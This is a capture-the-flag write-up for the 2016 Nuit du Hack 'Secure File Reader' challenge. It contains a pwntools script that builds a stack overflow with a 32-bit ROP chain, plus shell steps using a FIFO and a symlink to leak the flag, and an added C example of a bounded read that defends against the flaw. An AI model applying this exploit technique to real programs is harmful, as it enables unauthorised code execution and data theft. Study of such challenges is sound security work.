Tags: rop 

Rating: 2.0

```python
# Secure File Reader
# solution by foxtrot

# ssh [email protected] -p 55552 # password is chall

from pwn import *

# Gadget and function addresses taken from the challenge binary (see "Rop chain" below)
rop_chain = [0x8048e74, 0x80483ad, 0x80c296a, 0x080eff60, 0x804fac0, 0x80481d1,
             0x080eff60, 0x804e820, 0x80481d1, 0xdeadbeef, 0xdeadbeef]

with open('attack', 'wb') as f:
    f.write(b'X' * 4124)                          # padding up to the saved return address
    f.write(b''.join(p32(a) for a in rop_chain))  # the chain itself, little-endian 32-bit

# Run the attack using the following:
# cd $(mktemp -d)
# # somehow get the attack file (generated by running the above code) into that directory; I used scp from my system
# ln -s /home/chall/flag arena.c
# mkfifo attackfifo
# cat attack > attackfifo | ~/pwn attackfifo

# Explanation:
#
# The FIFO has size 0, so the file size will not cause problems, while reading from it still lets the buffer overflow after 4124 bytes.
# Then we just build a ROP chain.
# The "arena.c" string is already in the binary, so we reuse it.
# safespot-content-location is just some large location in .bss, found using `objdump -x pwn | grep bss`.

# Rop chain:
#
# 0x8048e74 <save_in_buffer>
# 0x80483ad <pop-pop-ret>
# 0x80c296a <"arena.c"> # symlink arena.c to flag
# 0x080eff60 <safespot-content-location>
#
# 0x804fac0 <puts>
# 0x80481d1 <pop-ret>
# 0x080eff60 <safespot-content-location>
#
# 0x804e820 <exit>
# 0x80481d1 <pop-ret>
# 0xdeadbeef <exit-code>
#
# 0xdeadbeef <just-for-fun> # actually, this is important (though not essential), but I am not telling you why :P it revolves around the clobbering mechanism in this executable
```
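The root cause the writeup leans on is that a FIFO reports a size of 0 to `stat()`, so any size-based guard on the reported file size says nothing about how many bytes `read()` will actually deliver. The following C is an added example, not the challenge binary's code and not part of the original writeup: it shows what a stat-based check sees for a pipe and a bounded read that caps the bytes stored at the buffer's capacity regardless of the reported size. `BUF_CAP`, `read_bounded`, `reported_size` and the demo helpers are assumed names, and the 4124-byte capacity is constructed to mirror the overflow offset above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed example: the fixed buffer size mirrors the 4124-byte
   overflow offset from the writeup; it is not the challenge's own code. */
#define BUF_CAP 4124

/* What a stat()-based size check sees for a descriptor. A FIFO or pipe
   reports st_size 0 even when a writer is about to push thousands of
   bytes through it, so st_size must never bound a read into a fixed buffer. */
long long reported_size(int fd) {
    struct stat st;
    if (fstat(fd, &st) != 0) return -1;
    return (long long)st.st_size;
}

/* Hardened read: never stores more than cap bytes no matter what the
   descriptor claims. *truncated is set to 1 if the stream carried more
   than cap bytes. Returns bytes stored, or -1 on a read error. */
ssize_t read_bounded(int fd, char *buf, size_t cap, int *truncated) {
    size_t total = 0;
    *truncated = 0;
    while (total < cap) {
        ssize_t n = read(fd, buf + total, cap - total);
        if (n < 0) return -1;
        if (n == 0) return (ssize_t)total;   /* EOF before the buffer filled */
        total += (size_t)n;
    }
    /* Buffer is full: probe for one more byte to detect oversized input. */
    char probe;
    ssize_t n = read(fd, &probe, 1);
    if (n < 0) return -1;
    if (n > 0) *truncated = 1;
    return (ssize_t)total;
}

/* Demo helper: push len bytes of 'X' through a pipe (whose stat size stays 0)
   and return 1 if read_bounded() flagged an overrun, 0 if it fit, -1 on error. */
int pipe_overrun_detected(size_t len) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char *src = malloc(len);
    if (!src) { close(fds[0]); close(fds[1]); return -1; }
    memset(src, 'X', len);
    /* len stays well below the kernel pipe buffer, so a single write
       completes without a concurrent reader. */
    ssize_t w = write(fds[1], src, len);
    close(fds[1]);
    free(src);
    if (w != (ssize_t)len) { close(fds[0]); return -1; }

    static char buf[BUF_CAP];
    int truncated = 0;
    ssize_t got = read_bounded(fds[0], buf, BUF_CAP, &truncated);
    close(fds[0]);
    return got < 0 ? -1 : truncated;
}

/* st_size of an empty pipe's read end, for comparison with the data volume. */
long long empty_pipe_reported_size(void) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    long long sz = reported_size(fds[0]);
    close(fds[0]);
    close(fds[1]);
    return sz;
}

int main(void) {
    printf("empty pipe st_size    : %lld\n", empty_pipe_reported_size());
    printf("%d bytes via pipe   : truncated=%d\n", BUF_CAP + 1, pipe_overrun_detected(BUF_CAP + 1));
    printf("100 bytes via pipe    : truncated=%d\n", pipe_overrun_detected(100));
    return 0;
}
```

The probe read after the buffer fills is what turns a silent truncation into a detectable condition: a reader that stops exactly at capacity would still be safe, but would not know that the input was larger than the buffer and could not log or reject it.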

Original writeup (https://github.com/TeamColonelPanic/write-ups/blob/master/2016/nuit-du-hack-qualifier-2016/exploitation/secure-file-reader/README.md).